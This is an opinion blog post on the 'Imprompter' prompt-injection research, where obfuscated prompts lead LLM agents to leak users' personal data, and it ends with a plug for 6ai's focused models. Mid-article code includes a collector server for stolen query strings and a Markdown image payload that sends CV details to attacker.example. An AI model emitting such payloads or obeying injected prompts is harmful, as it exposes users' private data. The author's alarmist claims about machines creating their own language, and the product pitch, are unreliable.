
The “Impossible Language” Trickery

LLMs – No Guardrails and Nefarious Methods





Perry C. Douglas

October 17, 2024


I wrote an article a few weeks back titled “Reasoning and the Impossible Language - The Fragility of Large Language Models.” The article was about what MIT professor emeritus and public intellectual Noam Chomsky called the “impossible language” of LLMs: a language understandable and applicable only to the machine itself. Using ChatGPT as an example, Chomsky explained why generative AI/LLM systems are fundamentally deficient: they don’t know the real world. The “impossible language” violates all the rules of linguistics and more, but those same violations, he says, are the only way it (ChatGPT) can perform.

 

Chomsky points out that the impossible machine language becomes dangerous because the machine creates its own rules and methods that only it can understand. Where decisions come from, and how they are generated and formed, are critical to how they are translated into words and, subsequently, how they are interpreted and acted upon.


The danger comes when LLMs develop and operate on their own! A separate impossible language develops, putting more control in the hands of the machine, which Chomsky says creates grave safety concerns.

 

These concerns are brought to light in a new research study, “Imprompter: Tricking LLM Agents into Improper Tool Use” (https://imprompter.ai/).






The authors report a “…shift in the security foundations of agent-based systems and surface a new class of automatically computed obfuscated adversarial prompt attacks that violate the confidentiality and integrity of user resources connected to an LLM agent.” For example, LLMs are increasingly becoming agents that carry out tasks on behalf of humans, such as booking flights, or that are connected to an external database to provide specific answers.
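
To make that concrete, here is a minimal sketch, in Python, of the kind of agent loop the paper is describing: the model decides which tool to call, and the agent executes that call against the user’s resources. The stubbed model call and the tool names (search_flights, read_address_book) are hypothetical illustrations, not anything taken from the Imprompter paper.

```python
# Illustrative sketch only: a toy agent loop showing how an LLM gets wired to
# user resources via tools. The model call is stubbed; tool names are invented.

def fake_llm(prompt: str) -> dict:
    # Stand-in for a real model call; a real agent parses the model's reply
    # to decide which tool to invoke and with what arguments.
    return {"tool": "read_address_book", "args": {"query": "travel contacts"}}

ADDRESS_BOOK = {"travel contacts": ["alice@example.com", "bob@example.com"]}

TOOLS = {
    "search_flights": lambda args: f"flights matching {args}",
    "read_address_book": lambda args: ADDRESS_BOOK.get(args["query"], []),
}

def run_agent(user_request: str) -> str:
    decision = fake_llm(user_request)   # the model chooses a tool
    tool = TOOLS[decision["tool"]]      # the agent trusts that choice
    result = tool(decision["args"])     # user data flows through the tool
    # Whatever the model asks for, the agent executes; that trust boundary is
    # exactly what obfuscated adversarial prompts abuse.
    return f"Tool {decision['tool']} returned: {result}"

if __name__ == "__main__":
    print(run_agent("Book me a flight and cc my travel contacts"))
```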


“Our current hypothesis is that the LLMs learn hidden relationships between tokens from text, and these relationships go beyond natural language,” the researchers explain. “It is almost as if there is a different language that the model understands.”


So yes, the machine seems well on its way to creating its own impossible language: gathering personal information, formatting it into commands, and, in effect, making its own decisions. In the attacker example given, “The LLM visits this URL to try and retrieve the image and leaks the personal information to the attacker. The LLM responds in the chat with a 1x1 transparent pixel that can’t be seen by the users.”
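
To see why a single invisible image is enough, here is a rough, hypothetical sketch of the attacker’s side of that exchange: a tiny server that logs whatever arrives in the URL’s query string and answers with a transparent 1x1 GIF, so nothing visible ever appears in the chat. The host, port, path, and parameter name below are invented for illustration; this is not the researchers’ code.

```python
# Hypothetical attacker-side sketch: log the exfiltrated query string, then
# reply with a 1x1 transparent GIF so the "image" renders as nothing.
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

# Commonly used base64 for a 1x1 transparent GIF (the classic tracking pixel).
PIXEL = base64.b64decode(
    "R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"
)

class Collector(BaseHTTPRequestHandler):
    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        print("exfiltrated:", query.get("data", []))   # the attacker's "log"
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)                        # invisible to the user

if __name__ == "__main__":
    # e.g. the agent is tricked into fetching
    # http://127.0.0.1:8000/collect?data=<URL-encoded personal details>
    HTTPServer(("127.0.0.1", 8000), Collector).serve_forever()
```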


Therefore, people can be engineered and suckered into believing whatever unintelligible prompt is put in front of them, without questioning it. The example of the CV is given, where “researchers point to numerous websites that provide people with prompts they can use. They tested the attack by uploading a CV to conversations with chatbots, and it was able to return the personal information contained within the file,” an “information exfiltration attack.”
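
For illustration only, the model’s poisoned output might look roughly like the snippet below: the details pulled from the CV get URL-encoded into a Markdown image pointing at an attacker-controlled address, so simply rendering the reply sends the data out, with no click required. The name, data, and domain are invented, not taken from the paper.

```python
from urllib.parse import quote

# Fake PII standing in for whatever the prompt scraped from the uploaded CV.
pii_from_cv = "Jane Doe; jane@example.com; +1-555-0100"

# A Markdown image whose URL carries the data; rendering it triggers the fetch.
payload = f"![img](http://attacker.example/collect?data={quote(pii_from_cv)})"
print(payload)
```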


People are unwittingly giving consent to share personal information without knowing how it is going to be used; they don’t know what’s going on, and they are being tricked into sharing their info.

 

Various examples, demos and textual adversarial prompts are presented in the research paper, showing a nearly 80% success rate in an end-to-end evaluation.


"ChatGPT, the world’s most used chatbot, governed by training data that nobody knows about, obeying an algorithm that is only hinted at, glorified by the media, and yet with ethical guardrails that only sorta kinda work and that are driven more by text similarity than any true moral calculus.” 


There is no government regulation of any of this; LLMs are serving up “propaganda, troll farms, and rings of fake websites that degrade trust across the internet.”

The more the impossible language grows, the greater the probability that AI gets away from us: increasingly dangerous and uncontrollable, iniquitous and atrocious, becoming the arbiter of our lives.

 

The more we use LLMs, the more holes we keep finding. LLMs are like Swiss cheese, says computer scientist Gary Marcus, and that causes “huge problems.” This one happens to be on the security front: our personal information is being extracted, who knows where it ends up, and the risks it presents to users are real. It’s always what we don’t know that can harm us most.

 

Large Language Models are over-hyped, particularly by media outlets that pretend to know what they are talking about. The idea that you can just build larger and larger language models and they will provide all the answers is a display of wilful ignorance or hubris, and of a lack of understanding of how intelligence and problem-solving authentically work in the real world.

 

Focus and strategy have always been the optimal approaches to problem-solving. Therefore, 6ai Technologies focuses on building Focused Language Model Templates (FLM-Ts) to solve the very specific problem the user is engaged in. Unlike LLMs, FLM-Ts do not naively and simplistically seek to become larger and larger, chasing science fiction and ending up a jack of all trades but a master of none.


6ai believes smaller and more focused is better, without the aggravations and dangers of LLM hallucinations and security risks, to name just a couple of problems. Strategically focused problem-solving has consistently been proven in the real world, so why would we change that fundamental approach?

